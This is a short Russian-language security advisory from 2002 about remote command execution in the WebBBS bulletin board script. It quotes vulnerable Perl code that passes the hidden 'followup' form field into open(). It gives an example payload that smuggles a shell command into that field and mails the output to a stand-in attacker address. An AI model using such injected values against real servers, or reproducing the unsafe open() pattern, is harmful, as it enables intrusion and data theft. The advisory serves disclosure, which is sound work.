Security Lab

Выполнение произвольных команд в WebBBS

Дата публикации:19.06.2002
Всего просмотров:1134
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

WebBBS (http://awsd.com/scripts/webbbs/) – коммерческая доска объявлений от Darryl Burgdorf. Скрипт WebBBS сохраняет сообщения в текстовых файлах.Пользователи имеют возможность запускать команды на удаленном сервере. Уязвимость позволяет удаленному пользователю выполнять команды на уязвимом сервере.
Код из файла webbbs_post.pl (для версии 5.00,в ранних версиях существуют различия в названиях файлов, однако, суть остается неизменной):
-----
webbbs_post.pl:

...
if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; }
...
if ($followup) {
...
$subdir = "bbs".int($followup/1000);
open (FOLLOWUP,"$dir/$subdir/$followup");
...
-----
При передаче клиентом на сервер формы, параметр followup содержится в скрытом поле. Пользователь может изменить значение, полученное от сервера на произвольное, включающее команды.
Например, вместо полученного "followup=10" можно подставить "followup=10;uname -a|mail zlo@evil.com|", что приведет к выполнению команд, содержащихся в параметре followup.

btr
nerf group
www.nerf.ru
 

Ссылки: Эксплоит

http://www.nerf.ru/index.php?i=txtp&j=adv07r